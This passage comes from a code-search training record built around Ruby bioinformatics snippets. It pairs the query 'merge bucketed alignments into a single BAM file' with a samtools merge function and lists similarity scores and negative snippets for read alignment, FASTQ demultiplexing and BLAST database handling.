Aging_Transformers so we\n # can have some sense of why we're seeing what we're seeing\n recs << new_obj({\n class: 'group_recorder',\n group: \"\\\"groupid=#{AGING_GROUPID}\\\"\",\n property: 'power_in',\n complex_part: 'MAG',\n interval: interval,\n limit: limit,\n file: file_base + 'xfmr_va.csv'\n })\n\n # Tap-change recorders\n find_by_class('regulator').each do |reg|\n recs << new_obj({\n class: 'recorder',\n parent: reg[:name],\n property: 'tap_A_change_count,tap_B_change_count,tap_C_change_count,tap_A,tap_B,tap_C,power_in_A.real,power_in_A.imag,power_in_B.real,power_in_B.imag,power_in_C.real,power_in_C.imag,power_out_A.real,power_out_A.imag,power_out_B.real,power_out_B.imag,power_out_C.real,power_out_C.imag,current_in_A.real,current_in_A.imag,current_in_B.real,current_in_B.imag,current_in_C.real,current_in_C.imag,current_out_A.real,current_out_A.imag,current_out_B.real,current_out_B.imag,current_out_C.real,current_out_C.imag',\n interval: interval,\n limit: limit,\n file: file_base + reg[:name][-5..-1] + '.csv'\n })\n end\n\n # Record voltage at the point of use, which conveniently is always\n # a triplex_meter\n recs << new_obj({\n class: 'group_recorder',\n group: 'class=triplex_meter',\n property: \"voltage_12\",\n complex_part: 'MAG',\n interval: interval,\n limit: limit,\n file: file_base + 'v_profile_12.csv'\n })\n\n # Record total PV output, if there is any SC solar to record\n if find_by_class('house').any? {|h| h.nested.any? {|n| n[:groupid] == SC_GROUPID }}\n recs << new_obj({\n class: 'collector',\n group: \"\\\"class=ZIPload AND groupid=#{SC_GROUPID}\\\"\",\n property: 'sum(actual_power.real)',\n interval: MINUTE_INTERVAL,\n limit: limit,\n file: file_base + 'sc_gen.csv'\n })\n end\n\n # Record aggregate SC storage stats, if there's any storage\n unless find_by_four_quadrant_control_mode(SC_CONTROL_MODE).empty?\n recs << new_obj({\n class: 'collector',\n group: \"\\\"class=inverter\\\"\",\n property: 'sum(sc_dispatch_power),avg(battery_soc),std(battery_soc),min(battery_soc),max(battery_soc)',\n interval: MINUTE_INTERVAL,\n limit: limit,\n file: file_base + 'sc_storage.csv'\n })\n end\n\n # Record capacitor switch states, if any\n caps = find_by_class('capacitor')\n unless caps.empty?\n\n prop = caps.map do |cap|\n PHASES.map do |ph|\n \"#{cap[:name]}:switch#{ph}\"\n end\n end.flatten.join ','\n\n recs << new_obj({\n class: 'multi_recorder',\n property: prop,\n interval: interval,\n limit: limit,\n file: file_base + 'cap_switch.csv'\n })\n end\n\n recs\n end",
"def readProblem()\n # If not provided on command line, prompt user for input file:\n if ARGV[0] == nil\n printf \"Data file? \"\n fname = gets.chomp!\n else\n fname = ARGV[0]\n end\n infile = open(fname)\n\n # Read it all in, first n...\n n = infile.gets.to_i\n\n # ... then the values and weights...\n val = Array.new(n)\n wt = Array.new(n)\n for i in 0..n-1\n dummy,val[i],wt[i] = infile.gets.split.map {|x| x.to_i}\n end\n\n # ... and finally the capacity:\n cap = infile.gets.to_i\n \n return n,val,wt,cap\nend",
"def create_arrays(file)\n file.each do |line|\n new_string = line.split\n if new_string.last.is_number?\n # array_location removes the number character and converts it to an\n # integer\n # this variable will then be subtracted by 1 to determine the correct\n # index number later\n array_location = new_string.pop.to_i\n new_string.reverse!\n if (array_location) <= new_string.length\n puts new_string[array_location - 1]\n end\n end\n end\nend"
] |
[
"0.52647674",
"0.51238215",
"0.49227256",
"0.4905906",
"0.4859709",
"0.48278394",
"0.47935632",
"0.47273198",
"0.47244495",
"0.4696616",
"0.4696616",
"0.4687543",
"0.4668299",
"0.46392527",
"0.4590947",
"0.4578109",
"0.45562068",
"0.4546629",
"0.4539287",
"0.4511761",
"0.44992033",
"0.4497493",
"0.44898167",
"0.44776285",
"0.44762027",
"0.44538254",
"0.4444865",
"0.44447693",
"0.44413915",
"0.44401538",
"0.4435788",
"0.4433891",
"0.44264475",
"0.44258192",
"0.4419563",
"0.43955755",
"0.43878776",
"0.43850994",
"0.4381949",
"0.43818793",
"0.4374901",
"0.43735185",
"0.43713814",
"0.43704474",
"0.43563038",
"0.43421075",
"0.4337949",
"0.43378738",
"0.43329698",
"0.43323535",
"0.432866",
"0.43273166",
"0.43227476",
"0.43227476",
"0.43215942",
"0.43194616",
"0.4316244",
"0.43140277",
"0.43113118",
"0.4284396",
"0.42793927",
"0.42718714",
"0.4252847",
"0.42484555",
"0.42348585",
"0.42321947",
"0.42318824",
"0.423179",
"0.42267004",
"0.4221933",
"0.42130822",
"0.42021203",
"0.41961575",
"0.41953978",
"0.4195095",
"0.4191635",
"0.41906488",
"0.41902328",
"0.41881064",
"0.41861218",
"0.41857737",
"0.41851783",
"0.4184907",
"0.4184523",
"0.41844305",
"0.4182424",
"0.41754994",
"0.41746897",
"0.41729078",
"0.41650906",
"0.41631287",
"0.41631103",
"0.41629776",
"0.41615745",
"0.41615433",
"0.41614673",
"0.4154142",
"0.41527405",
"0.41504645",
"0.4150092"
] |
0.55839044
|
0
|
Merges bucketed alignments into single bam file infiles array of filenames outfile merged file
|
def unbucketize(infiles, outfile)
run_cmd("samtools merge -f #{outfile} #{infiles.join(' ')}")
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def bucketized_alignment\n # split reads into buckets according to their size and err_rate\n @buckets = bucketize(@err_rate)\n\n # perform alignment on each bucket\n @buckets.reverse_each do |lower, upper, mismatches|\n @names.set_bucket(lower, upper)\n mapped, unmapped = align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: mismatches\n }\n )\n @mapped_bams << mapped\n @unmapped_bams << unmapped\n @max_mismatches = [@max_mismatches, mismatches].max\n end\n\n # merge alignments\n @names.unset_bucket\n unbucketize(@mapped_bams, @names.get('mapped_merged'))\n unbucketize(@unmapped_bams, @names.get('unmapped_merged'))\n end",
"def merge_files(files)\n files.reduce(nil) do |merged, file|\n puts \"Merging #{file}\" if @verbose\n merge(merged, file)\n end\n end",
"def unbucketized_alignment\n align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: @mismatches\n }\n )\n mapped_all = @software == :star ? \\\n @names.get('mapped_all_star') : @names.get('mapped_all')\n run_cmd(\"cp #{mapped_all} #{@names.get('mapped_merged')}\")\n unless @software == :star\n run_cmd(\n \"cp #{@names.get('unmapped')} #{@names.get('unmapped_merged')}\"\n )\n end\n @max_mismatches = @mismatches\n end",
"def merge\n @filenames.each do |f_name|\n reader = Fileread_with_row_index.new(f_name)\n last_row = reader.count_row - 1\n for i in 0..last_row \n line = reader.read_row(i)\n @writer.puts(line)\n end\n end\n end",
"def process_alignment\n # init vars\n @names = []\n @seqs = []\n \n @alignment = \"-B #{@basename}.aln\"\n\n # import alignment file\n @content = IO.readlines(@infile).map {|line| line.chomp}\n \n #check alignment for gap-only columns\n remove_inserts\n \n #write query-file\n File.open(@infile, \"w\") do |file|\n file.write(\">#{@names[0]}\\n\")\n file.write(\"#{@seqs[0]}\\n\")\n end\n \n #write aln-file\n File.open(@basename + \".aln\", \"w\") do |file|\n @names.each_index do |num|\n file.write(\"Sequence#{num} \")\n file.write(\" \") if (num < 10)\n file.write(\" \") if (num < 100)\n file.write(\"#{@seqs[num]}\\n\")\n end\n end\n end",
"def parse_bam_to_intermediate_files(out_prefix)\n script=File.join(File.dirname(__FILE__),\"bam_to_insert_size_bed.awk\")\n cmd = @conf.cluster_cmd_prefix(free:1, max:12, sync:true, name:\"bed_prep_#{File.basename(@bam.path)}\") +\n %W(/bin/bash -o pipefail -o errexit -c)\n filt = \"samtools view #{@bam.path} | awk -f #{script} -vbase=#{out_prefix} -vendness=\"\n if @bam.paired?\n filt += \"pe\"\n else\n filt += \"se -vsize=#{@bam.fragment_size}\"\n end\n cmd << \"\\\"#{filt}\\\"\"\n puts cmd.join(\" \") if @conf.verbose\n unless system(*cmd)\n @errors << \"Failure prepping bedfiles for #{@bam} #{$?.exitstatus}\"\n return false\n end\n if @bam.paired?\n IO.foreach(out_prefix+FRAGMENT_SIZE_SUFFIX) do |line|\n @bam.fragment_size = line.chomp.to_i\n break\n end\n end\n IO.foreach(out_prefix+\"_num_alignments.txt\") do |line|\n @bam.num_alignments = line.chomp.to_i\n break\n end\n return true\n end",
"def merge(*files)\n files.each do |f|\n f = check_for_file(f)\n @merged << f\n end\n end",
"def place_files_in_buckets\n @files.each do |file|\n place_file_in_buckets(file)\n end\n end",
"def merge_data(input_files)\n for filename in input_files\n merge_into_hash(filename)\n end\n sanitize_hash\n end",
"def merge(file, *times)\n\tparts = []\n\tsplit! file, *times do |out|\n\t\tparts << out \n\tend\n\tparts = parts.join ' + '\n\tout = merge_name(file, *times)\n\tsystem \"mkvmerge -o #{out} #{parts}\"\nend",
"def align_compressed_reads_to_human_genome_reference_using_bowtie\n\t\tputs \"step 7 align compressed reads to human genome reference using bowtie\"\n\t\tfiles.each_pair do |k,v|\n\t\t\t#\tbowtie's verbose is RIDICULOUS!\n\t\t\t#\tIt prints WAY too much and adds WAY too much time.\n\t\t\t#\t\t\t\t\"--verbose \"<<\n\t\t\tcommand = \"bowtie -n #{bowtie_mismatch} -p #{bowtie_threads} -f \" <<\n\t\t\t\t\"-S #{bowtie_index_human} compress_#{k}lane.fa compress_#{k}lane.sam\"\n\t\t\tcommand.execute\n\t\t\t\"compress_#{k}lane.sam\".file_check(die_on_failed_file_check) #\tthe reads that DIDN'T align?\tNO\n\n\t\t\t\"sam2names.rb compress_#{k}lane.sam bowtie_#{k}lane.names\".execute\n\t\t\t\"bowtie_#{k}lane.names\".file_check(die_on_failed_file_check)\n\t\tend\n\n\t\tpull_reads_from_fastas(\n\t\t\tfiles.keys.sort.collect{|k| \"bowtie_#{k}lane.names\" },\n\t\t\tfiles.keys.sort.collect{|k| \"compress_#{k}lane.fa\" },\n\t\t\tfiles.keys.sort.collect{|k| \"bowtie_#{k}lane.fa\" })\n\n#\n#\tThis script has fixed input of chopped_leftlane.psl (and right or single)\n#\tBAD. BAD. BAD.\tTODO\n#\tThis is only informative and nothing uses the output\n#\tso could be commented out.\n#\n#\n#\tTODO Replaced with ruby version, but still in development\n#\n#\n#\t\tcommand = \"candidate_non_human.rb \"\n#\t\t#\tfiles is a hash and the keys are not guaranteed to be sorted\n#\t\t#\tsort alphabetically and left is first, right is last (conveniently)\n#\t\tfiles.keys.sort.each{|k| command << \"bowtie_#{k}lane.names \" }\n#\t\tcommand.execute\n#\t\tfile_check( \"candidate_non_human.txt\" )\n\tend",
"def process_workspace_bucket_files(files)\n # first mark any files that we already know are study files that haven't changed (can tell by generation tag)\n files_to_remove = []\n files.each do |file|\n # first, check if file is in a submission directory, and if so mark it for removal from list of files to sync\n if @submission_ids.include?(file.name.split('/').first) || file.name.end_with?('/')\n files_to_remove << file.generation\n else\n directory_name = DirectoryListing.get_folder_name(file.name)\n found_file = {'name' => file.name, 'size' => file.size, 'generation' => file.generation}\n # don't add directories to files_by_dir\n unless file.name.end_with?('/')\n # add to list of discovered files\n @files_by_dir[directory_name] ||= []\n @files_by_dir[directory_name] << found_file\n end\n found_study_file = @study_files.detect {|f| f.generation.to_i == file.generation }\n if found_study_file\n @synced_study_files << found_study_file\n files_to_remove << file.generation\n end\n end\n end\n\n # remove files from list to process\n files.delete_if {|f| files_to_remove.include?(f.generation)}\n\n # next update map of existing files to determine what can be grouped together in a directory listing\n @file_extension_map = DirectoryListing.create_extension_map(files, @file_extension_map)\n\n files.each do |file|\n # check first if file type is in file map in a group larger than 10 (or 20 for text files)\n file_extension = DirectoryListing.file_extension(file.name)\n directory_name = DirectoryListing.get_folder_name(file.name)\n max_size = file_extension == 'txt' ? 20 : 10\n if @file_extension_map.has_key?(directory_name) && !@file_extension_map[directory_name][file_extension].nil? && @file_extension_map[directory_name][file_extension] >= max_size\n process_directory_listing_file(file, file_extension)\n else\n # we are now dealing with singleton files or fastqs, so process accordingly (making sure to ignore directories)\n if DirectoryListing::PRIMARY_DATA_TYPES.any? {|ext| file_extension.include?(ext)} && !file.name.end_with?('/')\n # process fastq file into appropriate directory listing\n process_directory_listing_file(file, 'fastq')\n else\n # make sure file is not actually a folder by checking its size\n if file.size > 0\n # create a new entry\n unsynced_file = StudyFile.new(study_id: @study.id, name: file.name, upload_file_name: file.name, upload_content_type: file.content_type, upload_file_size: file.size, generation: file.generation, remote_location: file.name)\n @unsynced_files << unsynced_file\n end\n end\n end\n end\n end",
"def cat_files file_groups\n file_groups.each do |group|\n check_exists(group[:paths])\n # this is the Illumina recommended approach to combining these fastq files.\n # See the Casava 1.8 Users Guide for proof\n files_list = group[:paths].join(\" \")\n command = \"cat #{files_list} > #{group[:path]}\"\n execute command\n end\n end",
"def all_files_aligned?\n return false unless files.count > 1 # have to be at least 2 files to be aligned\n # for every fa file there is a corresponding afa file\n # means that chopping off the extensions there will be 2 of every file\n #\n # basename('') chops off both the prefix and the suffix provided so\n # /path/to/foo.fa => foo\n (absolute_path.glob('*.fa').map {|f| f.basename('.fa')} - absolute_path.glob('*.afa').map {|f| f.basename('.afa')}).empty?\n end",
"def combine_acs_files\n @files_by_datetime = {}\n @acs_dirs.each { |dir_name, acs_dir| acs_dir.combine_files!(@files_by_datetime) }\n end",
"def merge_reads\n @reads_fpath = output_fpath(\"quanto.reads.tsv\")\n if !output_exist?(@reads_fpath)\n File.open(@reads_fpath, 'w') do |file|\n file.puts(reads_header.join(\"\\t\"))\n @objects.each do |obj|\n file.puts(open(obj[:summary_path]).read.chomp)\n end\n end\n end\n end",
"def combine_files!(infiles)\n make_files_by_datetime\n infiles.merge!(@files_by_datetime) do |key, oldval, newval|\n log_error(\"Key collision: #{key}, #{oldval}, #{newval}\")\n raise\n end\n end",
"def merge_pairwise(aligns)\n ps = aligns.map do |align| \n seqs = []\n align.each do |bioseq|\n seqs << bioseq.to_s\n end\n seqs\n end\n template = []\n #m,x,n\n x = 2\n ftemp = ps.first.first\n nmax = ps.map {|pair| pair.first.size }.max\n mmax = ps.size\n mar = (0...mmax).to_a\n others = mar.map { [] }\n ns = mar.map { 0 }\n tn = 0\n on = 0\n (0...nmax).each do |n|\n (t_dsh, t_no_dsh) = mar.partition do |m| \n # this is RUBY 1.8 ONLY!!\n ps[m][0][ns[m]] == 45 # '-' is ascii 45\n end\n\n # if a template has a dash, all other off-templates need a dash\n if t_dsh.size > 0\n template[tn] = 45\n t_no_dsh.each do |m|\n # don't update these guys counter\n others[m][tn] = 45\n end\n t_dsh.each do |m|\n others[m][tn] = ps[m][1][ns[m]]\n ns[m] += 1\n end\n else # no dashes in the template\n t_no_dsh.each do |m|\n others[m][tn] = ps[m][1][ns[m]]\n end\n template[tn] = ps[0][0][ns[0]]\n ns.map!{|v| v+1 } \n end\n tn += 1\n end\n [cs_to_s(template), others.map! {|ar| cs_to_s(ar) } ]\n end",
"def prepare_reads(base, map, fqgz0, *fqgzs0)\n\n fqgzs = [fqgz0] + fqgzs0\n\n bcs = Hash.new\n open(map, 'r').each do |line|\n bc, well = line.rstrip.split(',')\n bcs[bc] = well\n end\n \n bcl = bcs.keys.map!{|key| key.length}.sort.uniq[0]\n\n tso_pattern = '.'*options.umi_length + '.'*bcl + 'GG'\n\n #\n \n STDERR.puts \"#{`date`.strip}: Demultiplexing each raw sequence files...\"\n \n fqgz2csv0 = Hash.new\n fqgz2csv1 = Hash.new\n fqgz2base = Hash.new\n fqgzs.each do |fqgz|\n fqgz2csv0[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2csv1[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2base[fqgz] = get_temporary_path('strt.preprocess', 'base', false)\n end\n\n Parallel.map(fqgz2csv0.keys, in_processes: options.parallel) do |fqgz|\n cmds = [\n \"unpigz -c #{fqgz}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv0[fqgz]}\",\n \"fq1l match_5end#{grep_prefix_option(options)} #{tso_pattern}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv1[fqgz]}\",\n \"fq1l annotate_index --first-cycle=#{options.umi_length+1} --last-cycle=#{options.umi_length+bcl}\",\n \"fq1l annotate_umi --first-cycle=1 --last-cycle=#{options.umi_length}\",\n \"fq1l sort_index#{coreutils_prefix_option}#{parallel_option(options)} --buffer-size=#{(options.maximum_memory/(fqgz2csv0.keys.size+1)).to_i}%\",\n \"fq1l demultiplex #{fqgz2base[fqgz]} #{map}\"\n ]\n cmds.insert(2, \"#{head_command(options)} -n #{options.reads}\") unless options.reads.nil?\n stats = Open3.pipeline(*cmds)\n stats.each_index do |i|\n raise \"Fail at process #{i}; #{stats[i]}; #{cmds[i]}\" unless stats[i].success? || (stats[i].signaled? && stats[i].termsig == 13)\n end\n end\n\n system \"fq1l sum_counts #{fqgz2csv0.values.join(' ')} > #{base}.count.step1.csv\"\n unlink_files(fqgz2csv0.values)\n \n system \"fq1l sum_counts #{fqgz2csv1.values.join(' ')} > #{base}.count.step2.csv\"\n unlink_files(fqgz2csv1.values)\n\n #\n \n (bcs.values + ['NA']).each do |well|\n\n STDERR.puts \"#{`date`.strip}: Finishing well #{well}...\"\n \n tmpfqgzs = fqgz2base.values.map {|base| \"#{base}.#{well}.fq.gz\"}\n csvs = Array.new(6) {|i| \"#{base}.#{well}.count.step#{i+3}.csv\"}\n \n pipeline(\"unpigz -c #{tmpfqgzs.join(' ')}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[0]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_duplicate\",\n \"#{fq1l_count_command(options)} #{csvs[1]}\",\n \"fq1l trim_3end_quality\",\n \"#{fq1l_count_command(options)} #{csvs[2]}\",\n \"fq1l trim_3end_primer#{coreutils_prefix_option}#{grep_prefix_option(options)}#{parallel_option(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[3]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_degenerate\",\n \"#{fq1l_count_command(options)} #{csvs[4]}\",\n \"fq1l trim_5end --minimum-length=#{options.minimum_length} #{tso_pattern}+\",\n \"#{fq1l_count_command(options)} #{csvs[5]}\",\n \"fq1l restore#{coreutils_prefix_option}\",\n \"pigz -c > #{base}.#{well}.fq.gz\")\n \n unlink_files(tmpfqgzs)\n \n end\n \n end",
"def merge\n @mergeit.merge_data(@input_files)\n end",
"def process_bam(input_file, fasta, skip)\n\n\t\t# general settings\n\t\texclude = []\n\t\tFile.open(skip, 'r').readlines.each {|line| exclude << line.strip}\n\t\tfirstline = TRUE \n\t\tanchor_left = nil\n\t\tanchor_right = nil\n\t\tchr_a = nil\n\t\tchr_b = nil\n\t\tinput_hash = {}\n\n\t\t# Initiate chromosome hash\n\t\tDir.foreach(fasta) do |item|\n\t\t\tchr = item.sub('.fa', '')\n\t\t\tnext if item == '.' || item == '..' || exclude.include?(chr) \n\t\t\tinput_hash[chr] = {}\n\t\tend\n\n\t\tinput_hash.each_key do |chr_a|\n\t\t\tinput_hash.keys.each {|chr_b| input_hash[chr_a][chr_b] = []}\n\t\tend\n\n\t\t# read bam file\n\t\tinput_file.each do |line|\n\t\t\tline = line.strip.split(/\\s+/)\n\t\t\n\t\t\tif firstline \n\t\t\t\tanchor_left = ReadBam.new(line)\n\t\t\t\tfirstline = FALSE\n\t\t\t\tchr_a = anchor_left.chr\n\t\t\telse\n\t\t\t\tanchor_right = ReadBam.new(line)\n\t\t\t\tchr_b = anchor_right.chr\n\t\t\t\t\n\t\t\t\tif input_hash.has_key?(chr_a) && interChimeric?(anchor_left, anchor_right, exclude)\n\t\t\t\t\t\n\t\t\t\t\tif anchor_left.strand == 1 && anchor_right.strand == 1\n\t\t\t\t\t\tinput_hash[chr_b][chr_a] << [anchor_right, anchor_left] \n\t\t\t\t\telsif anchor_left.strand == -1 && anchor_right.strand == -1\n\t\t\t\t\t\tinput_hash[chr_a][chr_b] << [anchor_left, anchor_right] \n\t\t\t\t\telse\n\t\t\t\t\t\tinput_hash[chr_b][chr_a] << [anchor_right, anchor_left] \n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\tanchor_left, anchor_right = nil\n\t\t\t\tfirstline = TRUE\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Found anchor pairs.\"\t\t\n\t\tinput_hash\n\tend",
"def get_bam_files\n\n bam_files = self.study_files.by_type('BAM')\n bams = []\n\n bam_files.each do |bam_file|\n next unless bam_file.has_completed_bundle?\n\n bams << {\n 'name' => bam_file.name,\n 'url' => bam_file.api_url,\n 'indexUrl' => bam_file.study_file_bundle.bundled_file_by_type('BAM Index')&.api_url,\n 'genomeAssembly' => bam_file.genome_assembly_name,\n 'genomeAnnotation' => bam_file.genome_annotation\n }\n end\n bams\n end",
"def single_ucf_file_lists\n File.open(single_bad_ucf_file, 'a') do |mergedfile|\n Dir.glob(\"#{output_directory_path}*name.txt\").each do |file|\n File.foreach(file) do |line|\n mergedfile.write(line)\n end\n end\n end\n end",
"def blast_permutations! fastas, blast_dbs, cpus=4\n file_permutations = one_way_combinations fastas, blast_dbs, true\n file_permutations = file_permutations.select do |f1, f2|\n genome_from_fname(f1) != genome_from_fname(f2)\n end\n\n first_files = file_permutations.map(&:first)\n second_files = file_permutations.map(&:last)\n\n first_genomes = first_files.map do |fname|\n ary = fname.split(\".\")\n ary.take(ary.length - 1).join\n end\n\n second_genomes = second_files.map do |fname|\n ary = fname.split(BLAST_DB_SEPARATOR).take(1)\n AbortIf.abort_unless ary.length == 1,\n \"Bad file name for #{fname}\"\n\n ary = ary.first.split(\".\")\n\n File.basename ary.take(ary.length - 1).join\n end\n\n outf_names = first_genomes.zip(second_genomes).map do |f1, f2|\n \"#{f1}____#{f2}.aai_blastp\"\n end\n\n args = first_files.length.times.map do |idx|\n [first_files[idx], second_files[idx], outf_names[idx]]\n end\n\n Parallel.each(args, in_processes: cpus) do |infiles|\n query = infiles[0]\n db = infiles[1]\n out = infiles[2]\n\n cmd = \"diamond blastp --threads 1 --outfmt 6 \" +\n \"--query #{query} --db #{db} --out #{out} \" +\n \"--evalue #{EVALUE_CUTOFF}\"\n\n Process.run_and_time_it! \"Diamond blast\", cmd\n end\n\n outf_names\n end",
"def merge_shards(coverage_result_filenames)\n final_result = {}\n\n # collapse results from each shard in each file\n coverage_results = coverage_result_filenames.sort.flat_map do |result_filename|\n result_file = JSON.parse(IO.read(result_filename))\n result_file.values.map {|shard| shard['coverage'] }\n end\n\n # process each result\n puts \"CoverageEnforcer: Merging #{coverage_results.size} result shards...\"\n coverage_results.each_with_index do |result, result_index|\n result.keys.each do |filename|\n lines = result[filename]['lines']\n if !final_result.has_key?(filename)\n final_result[filename] = { 'lines' => lines }\n next\n end\n\n # merge\n existing_lines = final_result[filename]['lines']\n if existing_lines.size != lines.size\n puts \"CoverageEnforcer: WARNING, line length does not match for #{filename}\"\n end\n existing_lines.each_with_index do |existing_line, line_index|\n if existing_line.nil? && !lines[line_index].nil? || !existing_line.nil? && lines[line_index].nil?\n puts \"CoverageEnforcer: WARNING, one line is nil but the other is not for #{filename}\"\n end\n if !lines[line_index].nil?\n debug \" L#{line_index+1} += #{lines[line_index]}\"\n final_result[filename]['lines'][line_index] += lines[line_index]\n end\n end\n end\n end\n final_result\n end",
"def seqshash_to_fastafile(seqs,filename)\n oa = Bio::Alignment::OriginalAlignment.new(seqs)\n string_to_file(oa.output(:fasta),filename)\n\n end",
"def grouped(files); end",
"def fitFiles(target)\n buckets()\n runningSize = 0\n fileSet = FileSet.new(target, @log, @DEBUG, @LOG_DEBUG)\n \n # Go thru each bucket...\n @sortedBuckets.each do |bkt|\n Utils.printMux(@log, \"Processing bucket '#{bkt}'\")\n\n # ... And each file in the bucket\n @data[bkt].each do |file| \n Utils.printMux(@log, \"\\tProcessing file '#{file}'\")\n\n # The regular call to size won't work with larger (> 2 GB) files in some versions of Ruby, so call the custom version added above.\n fsize = File.size_big(file)\n\n Utils.printMux(@log, \"\\t\\t fsize: #{fsize}\\n\", @DEBUG, @LOG_DEBUG, Utils::DEBUG_LOW, Utils::LOG_LOW)\n Utils.printMux(@log, \"\\t\\trunningSize: #{runningSize}\\n\", @DEBUG, @LOG_DEBUG, Utils::DEBUG_LOW, Utils::LOG_LOW)\n Utils.printMux(@log, \"\\t\\t target: #{target}\\n\", @DEBUG, @LOG_DEBUG, Utils::DEBUG_LOW, Utils::LOG_LOW)\n\n\t\t\t # Sanity check the file size\n if (fsize < 0)\n Utils.printMux(@log, \"\\t\\t*** WARNING: fsize < 0 - skipping!\\n\", @DEBUG, @LOG_DEBUG, Utils::DEBUG_LOW, Utils::LOG_LOW)\n next\n end\n\n # Make sure this file won't push us over the limit\n if (fsize + runningSize) < target\n # take the first file in this bucket \n Utils.printMux(@log, \"\\t\\tAdding '#{file}' and removing from bucket\")\n fileSet.add(file, fsize)\n runningSize += fsize\n \n # Remove the file from the original list\n @data[bkt].delete(file)\n \n # See if we should remove the bucket, too\n if @data[bkt].size() == 0\n @data.delete(bkt)\n Utils.printMux(@log, \"Removed bucket '#{bkt}'\\n\")\n end\n else\n # Go to the next bucket and look at smaller files\n Utils.printMux(@log, \"\\t\\tDropping down to next bucket\\n\")\n break\n end\n\n # Give the CPU a bit of a break in between files\n sleep @sleepInterval\n end # iterate files\n\n # Give the CPU a bit of a break in between buckets\n sleep @sleepInterval\n end # iterate buckets\n \n # Save off the running size in the object\n @totalSize = runningSize\n \n # Save off the file set\n @fileSets << fileSet\n\n Utils.printMux(@log, \"totalSize: #{totalSize}\\n\", @DEBUG, @LOG_DEBUG, Utils::DEBUG_LOW, Utils::LOG_LOW)\n Utils.printMux(@log, \"fileSets:\\n\" + @fileSets.pretty_inspect(), @DEBUG, @LOG_DEBUG, Utils::DEBUG_LOW, Utils::LOG_LOW)\n\n return fileSet\n end",
"def combine_pdf_files\n create_process(process: \"COMBINE_PDF_FILES\")\n end",
"def unmerge(*files)\n files.each do |f|\n f = check_for_file(f)\n @unmerged << f\n end\n end",
"def convert_alignment(args={})\n i, o = args[:in], args[:out]\n \n ff = Bio::FlatFile.auto(i).to_a\n aln = Bio::Alignment.new(ff)\n File.open(o, 'w') do |o|\n o.write aln.output :phylip\n end\n \nend",
"def align(ref, ref_base, software, opts = {})\n if software == :tophat\n bt_flag =\n opts[:tophat_aligner] == :bowtie1 ? '--bowtie1' : ''\n gap_flag =\n opts[:mismatches] < 2 ? \"--read-gap-length #{opts[:mismatches]}\" : ''\n end\n\n aln_cmd = {\n bowtie1:\n 'bowtie' \\\n \" --seedlen=#{opts[:seedlen]} #{ref_base}\" \\\n \" --un=#{@names.get('fp')}\" \\\n \" -q #{@names.get('trim')} \" \\\n \" --sam #{@names.get('ncrna')}\",\n bowtie2:\n 'bowtie2' \\\n \" --un #{@names.get('fp')}\" \\\n \" -x #{ref_base}\" \\\n \" -L #{opts[:seedlen]}\" \\\n \" -U #{@names.get('trim')}\" \\\n \" -S #{@names.get('ncrna')}\",\n bwa:\n 'bwa mem' \\\n \" -k #{opts[:seedlen]}\" \\\n \" #{ref} \" \\\n \" #{@names.get('trim')} \" \\\n \"| samtools view -b - > #{@names.get('ncrna')} \" \\\n '&& bam2fastq' \\\n \" -o #{@names.get('fp')}\" \\\n \" --no-aligned #{@names.get('ncrna')}\",\n tophat:\n 'tophat' \\\n \" --read-edit-dist #{opts[:mismatches]}\" \\\n \" #{bt_flag}\" \\\n \" -N #{opts[:mismatches]}\" \\\n \" --output-dir #{@names.get('topout')}\" \\\n ' --no-novel-juncs' \\\n \" #{gap_flag}\" \\\n \" --GTF #{opts[:annotation]}\" \\\n \" #{ref_base} #{@names.get('fp')}\",\n star:\n 'STAR' \\\n \" --genomeDir #{ref_base}\" \\\n \" --outFilterMismatchNmax #{opts[:mismatches]}\" \\\n \" --readFilesIn #{@names.get('fp')}\"\\\n \" --outFileNamePrefix #{@names.get('mapped_all')}\"\n }\n\n target =\n opts[:seedlen].nil? ? @names.get('mapped_all') : @names.get('fp')\n run_cmd(aln_cmd[software]) unless skip_step?(target, 'aligning')\n [@names.get('mapped_all'), @names.get('unmapped')]\n end",
"def multistamp(primary_file, stamp_file, output); end",
"def archive\n files.each do |path|\n path_obj = Pathname.new(path)\n path_name = path_obj.dirname.to_s\n compress = Kellerkind::Compress.new(:target_path => out,\n :source_path => path,\n :tarball_prefix => path_obj.basename.to_s)\n compress.find_at_source_path = true\n if File.exists?(path)\n Kellerkind::Process.verbose(:start_compressing)\n compress.gzip\n if File.exists?(\"#{path_name}/#{compress.tarball_name}\")\n Kellerkind::Process.verbose(:finished_compressing)\n FileUtils.mv(\"#{path_name}/#{compress.tarball_name}\",\n \"#{out}/#{compress.tarball_name}\")\n FileUtils.rm_rf(path)\n FileUtils.touch(path) if self.recreate\n end\n end\n end\n end",
"def bundle_files(files)\n output = \"\"\n files.select { |f| !f.content.empty? }.each do |file|\n content = file.content\n path = file.path\n output << bundled_file_header(path) \n output << include_imported_files(content, path) if file.type[:ext] == 'css'\n content << javascript_fix if file.type[:ext] == '.js' \n output << content\n output << bundled_file_footer(path)\n end\n output\n end",
"def make_blastdbs! fnames, cpus=4\n suffix = BLAST_DB_SUFFIX\n outfiles = fnames.map { |fname| fname + suffix }\n\n Parallel.each(fnames, in_processes: cpus) do |fname|\n cmd = \"diamond makedb --threads 1 --in #{fname} \" +\n \"--db #{fname}#{BLAST_DB_SUFFIX}\"\n\n Process.run_and_time_it! \"Make db\", cmd\n end\n\n outfiles\n end",
